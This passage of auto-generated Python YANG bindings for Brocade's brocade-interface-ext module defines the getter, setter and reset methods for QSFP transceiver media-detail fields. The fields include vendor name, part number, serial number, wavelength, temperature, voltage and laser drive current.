          'defined-type': "brocade-interface-ext:enumeration",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sonet-scrambled': {'value': 9}, u'4b5b': {'value': 6}, u'rz': {'value': 1}, u'8b10b': {'value': 4}, u'nrz': {'value': 2}, u'sonet': {'value': 3}, u'manchester': {'value': 7}, u'unknown': {'value': 10}, u'64b66b': {'value': 5}, u'ieee-802-3ab': {'value': 8}},), is_leaf=True, yang_name="encoding", rest_name="encoding", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)""",
        })
    self.__encoding = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_encoding(self):
    """Reset the ``encoding`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__encoding = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sonet-scrambled': {'value': 9}, u'4b5b': {'value': 6}, u'rz': {'value': 1}, u'8b10b': {'value': 4}, u'nrz': {'value': 2}, u'sonet': {'value': 3}, u'manchester': {'value': 7}, u'unknown': {'value': 10}, u'64b66b': {'value': 5}, u'ieee-802-3ab': {'value': 8}},), is_leaf=True, yang_name="encoding", rest_name="encoding", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
  def _get_vendor_name(self):
    """
    Getter for the ``vendor-name`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_name.
    YANG description: the vendor of this interface.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__vendor_name
  def _set_vendor_name(self, v, load=False):
    """
    Setter for the ``vendor-name`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_name.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_vendor_name() directly.
    YANG description: the vendor of this interface.

    :param v: new value; coerced into the generated string type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a string leaf.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="vendor-name", rest_name="vendor-name", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """vendor_name must be of a type compatible with string""",
          'defined-type': "string",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-name", rest_name="vendor-name", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
        })
    self.__vendor_name = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_vendor_name(self):
    """Reset the ``vendor-name`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__vendor_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-name", rest_name="vendor-name", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
  def _get_vendor_oui(self):
    """
    Getter for the ``vendor-oui`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_oui.
    YANG description: the vendor IEEE company ID.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__vendor_oui
  def _set_vendor_oui(self, v, load=False):
    """
    Setter for the ``vendor-oui`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_oui.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_vendor_oui() directly.
    YANG description: the vendor IEEE company ID.

    :param v: new value; coerced into the generated string type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a string leaf.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="vendor-oui", rest_name="vendor-oui", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """vendor_oui must be of a type compatible with string""",
          'defined-type': "string",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-oui", rest_name="vendor-oui", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
        })
    self.__vendor_oui = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_vendor_oui(self):
    """Reset the ``vendor-oui`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__vendor_oui = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-oui", rest_name="vendor-oui", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
  def _get_vendor_pn(self):
    """
    Getter for the ``vendor-pn`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_pn.
    YANG description: the part number.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__vendor_pn
  def _set_vendor_pn(self, v, load=False):
    """
    Setter for the ``vendor-pn`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_pn.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_vendor_pn() directly.
    YANG description: the part number.

    :param v: new value; coerced into the generated string type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a string leaf.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="vendor-pn", rest_name="vendor-pn", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """vendor_pn must be of a type compatible with string""",
          'defined-type': "string",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-pn", rest_name="vendor-pn", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
        })
    self.__vendor_pn = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_vendor_pn(self):
    """Reset the ``vendor-pn`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__vendor_pn = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-pn", rest_name="vendor-pn", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
  def _get_vendor_rev(self):
    """
    Getter for the ``vendor-rev`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_rev.
    YANG description: the revision level.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__vendor_rev
  def _set_vendor_rev(self, v, load=False):
    """
    Setter for the ``vendor-rev`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_rev.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_vendor_rev() directly.
    YANG description: the revision level.

    :param v: new value; coerced into the generated string type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a string leaf.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="vendor-rev", rest_name="vendor-rev", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """vendor_rev must be of a type compatible with string""",
          'defined-type': "string",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-rev", rest_name="vendor-rev", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
        })
    self.__vendor_rev = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_vendor_rev(self):
    """Reset the ``vendor-rev`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__vendor_rev = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-rev", rest_name="vendor-rev", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
  def _get_distance(self):
    """
    Getter for the ``distance`` leaf (enumeration), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/distance.
    No YANG description is provided for this leaf in the source module.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__distance
  def _set_distance(self, v, load=False):
    """
    Setter for the ``distance`` leaf (enumeration), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/distance.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_distance() directly.

    :param v: new value; coerced into the generated restricted enumeration type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into the enumeration.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'short-dist': {'value': 1}, u'unknown': {'value': 4}, u'long-dist': {'value': 3}, u'inter-dist': {'value': 2}},), is_leaf=True, yang_name="distance", rest_name="distance", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """distance must be of a type compatible with enumeration""",
          'defined-type': "brocade-interface-ext:enumeration",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'short-dist': {'value': 1}, u'unknown': {'value': 4}, u'long-dist': {'value': 3}, u'inter-dist': {'value': 2}},), is_leaf=True, yang_name="distance", rest_name="distance", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)""",
        })
    self.__distance = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_distance(self):
    """Reset the ``distance`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__distance = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'short-dist': {'value': 1}, u'unknown': {'value': 4}, u'long-dist': {'value': 3}, u'inter-dist': {'value': 2}},), is_leaf=True, yang_name="distance", rest_name="distance", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
  def _get_media_form_factor(self):
    """
    Getter for the ``media-form-factor`` leaf (enumeration), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/media_form_factor.
    No YANG description is provided for this leaf in the source module.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__media_form_factor
  def _set_media_form_factor(self, v, load=False):
    """
    Setter for the ``media-form-factor`` leaf (enumeration), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/media_form_factor.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_media_form_factor() directly.

    :param v: new value; coerced into the generated restricted enumeration type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into the enumeration.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'tv': {'value': 5}, u'tw': {'value': 8}, u'mi': {'value': 6}, u'tp': {'value': 7}, u'm5': {'value': 3}, u'm6': {'value': 4}, u'sm': {'value': 1}, u'unknown': {'value': 9}, u'mx': {'value': 2}},), is_leaf=True, yang_name="media-form-factor", rest_name="media-form-factor", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """media_form_factor must be of a type compatible with enumeration""",
          'defined-type': "brocade-interface-ext:enumeration",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'tv': {'value': 5}, u'tw': {'value': 8}, u'mi': {'value': 6}, u'tp': {'value': 7}, u'm5': {'value': 3}, u'm6': {'value': 4}, u'sm': {'value': 1}, u'unknown': {'value': 9}, u'mx': {'value': 2}},), is_leaf=True, yang_name="media-form-factor", rest_name="media-form-factor", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)""",
        })
    self.__media_form_factor = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_media_form_factor(self):
    """Reset the ``media-form-factor`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__media_form_factor = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'tv': {'value': 5}, u'tw': {'value': 8}, u'mi': {'value': 6}, u'tp': {'value': 7}, u'm5': {'value': 3}, u'm6': {'value': 4}, u'sm': {'value': 1}, u'unknown': {'value': 9}, u'mx': {'value': 2}},), is_leaf=True, yang_name="media-form-factor", rest_name="media-form-factor", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
  def _get_wavelength(self):
    """
    Getter for the ``wavelength`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/wavelength.
    YANG description: wavelength of pluggable media.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__wavelength
  def _set_wavelength(self, v, load=False):
    """
    Setter for the ``wavelength`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/wavelength.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_wavelength() directly.
    YANG description: wavelength of pluggable media.

    :param v: new value; coerced into the generated string type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a string leaf.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="wavelength", rest_name="wavelength", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """wavelength must be of a type compatible with string""",
          'defined-type': "string",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="wavelength", rest_name="wavelength", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
        })
    self.__wavelength = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_wavelength(self):
    """Reset the ``wavelength`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__wavelength = YANGDynClass(base=unicode, is_leaf=True, yang_name="wavelength", rest_name="wavelength", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
  def _get_serial_no(self):
    """
    Getter for the ``serial-no`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/serial_no.
    YANG description: the serial number.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__serial_no
  def _set_serial_no(self, v, load=False):
    """
    Setter for the ``serial-no`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/serial_no.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_serial_no() directly.
    YANG description: the serial number.

    :param v: new value; coerced into the generated string type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a string leaf.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="serial-no", rest_name="serial-no", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """serial_no must be of a type compatible with string""",
          'defined-type': "string",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="serial-no", rest_name="serial-no", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
        })
    self.__serial_no = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_serial_no(self):
    """Reset the ``serial-no`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__serial_no = YANGDynClass(base=unicode, is_leaf=True, yang_name="serial-no", rest_name="serial-no", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
  def _get_date_code(self):
    """
    Getter for the ``date-code`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/date_code.
    YANG description: the vendor's manufacturing date code.

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__date_code
  def _set_date_code(self, v, load=False):
    """
    Setter for the ``date-code`` leaf (string), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/date_code.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_date_code() directly.
    YANG description: the vendor's manufacturing date code.

    :param v: new value; coerced into the generated string type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a string leaf.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="date-code", rest_name="date-code", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """date_code must be of a type compatible with string""",
          'defined-type': "string",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="date-code", rest_name="date-code", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
        })
    self.__date_code = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_date_code(self):
    """Reset the ``date-code`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__date_code = YANGDynClass(base=unicode, is_leaf=True, yang_name="date-code", rest_name="date-code", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
  def _get_temperature(self):
    """
    Getter for the ``temperature`` leaf (uint32), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/temperature.
    YANG description: the module temperature (degrees C).

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__temperature
  def _set_temperature(self, v, load=False):
    """
    Setter for the ``temperature`` leaf (uint32), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/temperature.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_temperature() directly.
    YANG description: the module temperature (degrees C).

    :param v: new value; coerced into the generated range-restricted uint32 type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a uint32 in 0..4294967295.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="temperature", rest_name="temperature", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='uint32', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """temperature must be of a type compatible with uint32""",
          'defined-type': "uint32",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="temperature", rest_name="temperature", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='uint32', is_config=True)""",
        })
    self.__temperature = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_temperature(self):
    """Reset the ``temperature`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__temperature = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="temperature", rest_name="temperature", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='uint32', is_config=True)
  def _get_voltage(self):
    """
    Getter for the ``voltage`` leaf (decimal64), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/voltage.
    YANG description: the supply voltage (Volts).

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__voltage
  def _set_voltage(self, v, load=False):
    """
    Setter for the ``voltage`` leaf (decimal64, 1 fractional digit), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/voltage.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_voltage() directly.
    YANG description: the supply voltage (Volts).

    :param v: new value; coerced into the generated precision-1 decimal type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a decimal64 value.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="voltage", rest_name="voltage", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """voltage must be of a type compatible with decimal64""",
          'defined-type': "decimal64",
          'generated-type': """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="voltage", rest_name="voltage", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)""",
        })
    self.__voltage = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_voltage(self):
    """Reset the ``voltage`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__voltage = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="voltage", rest_name="voltage", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
  def _get_current(self):
    """
    Getter for the ``current`` leaf (decimal64), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/current.
    YANG description: the laser diode drive current (milliAmps).

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__current
  def _set_current(self, v, load=False):
    """
    Setter for the ``current`` leaf (decimal64, 3 fractional digits), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/current.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_current() directly.
    YANG description: the laser diode drive current (milliAmps).

    :param v: new value; coerced into the generated precision-3 decimal type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a decimal64 value.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedPrecisionDecimalType(precision=3), is_leaf=True, yang_name="current", rest_name="current", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """current must be of a type compatible with decimal64""",
          'defined-type': "decimal64",
          'generated-type': """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=3), is_leaf=True, yang_name="current", rest_name="current", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)""",
        })
    self.__current = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
  def _unset_current(self):
    """Reset the ``current`` leaf to a fresh, unconfigured YANGDynClass default."""
    self.__current = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=3), is_leaf=True, yang_name="current", rest_name="current", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
  def _get_tx_power(self):
